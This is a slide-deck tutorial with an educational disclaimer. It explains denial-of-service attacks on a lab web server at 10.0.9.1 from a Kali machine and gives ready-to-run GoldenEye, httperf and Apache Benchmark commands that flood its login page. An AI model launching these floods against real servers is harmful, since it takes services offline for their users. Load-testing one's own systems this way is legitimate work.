This document discusses how to perform denial of service (DOS) attacks against a web server. It outlines the tools needed like Apache Benchmark (AB), httperf, and GoldenEye to overload a server located at 10.0.9.1 with random requests from an attacking machine at 10.0.9.2. Commands are provided to launch attacks using each tool, such as using GoldenEye to attack with random GET and POST methods with 10 workers and 500 concurrent connections.

1. Disclaimer: This tutorial is for educational purposes only and is
not intended to be put into practise unless you have authorised
access to the system you are trying to break into)

2. ● What is DOS
● Types OF DOS attack

3. Today we will cover the following points
● Prerequisite to DOS tools
● performing DOS Attacks
● AB(apache benchmark)
● Httperf t
● Golden eye

4. ● little knowledge of Linux
● Working internet connection
● 2 machines
● Tools like ab,httperf,goldeneye

5. Our Setup :-
Web server ip :- 10.0.9.1 (Apache on centos)
Attacker ip is :- 10.0.9.2 (kali Linux)

6. Using Golden Eye
Command
./goldeneye.py http://10.0.9.1/users/login -m random
Description
even this is enough to test DOS attack, This command will
attack on
server with random method i.e get and post with 10 worker
and 500
concurrent connection

7. httperf is a tool by hp for load testing of web
server.
command
httperf --server 10.0.9.1 --port 80 --uri /users/login/ -
-num-conn 1000 --rate 100

8. ab(Apache Benchmark) well known tool for benchmarking
apache web server its really easy to use.
Command
ab -n 1000 -c 10
http://10.0.9.1/users/logins

9. @S3curityB3ast
https://www.breakthesec.com
https://www.youtube.com/user/hackerkaustu
bh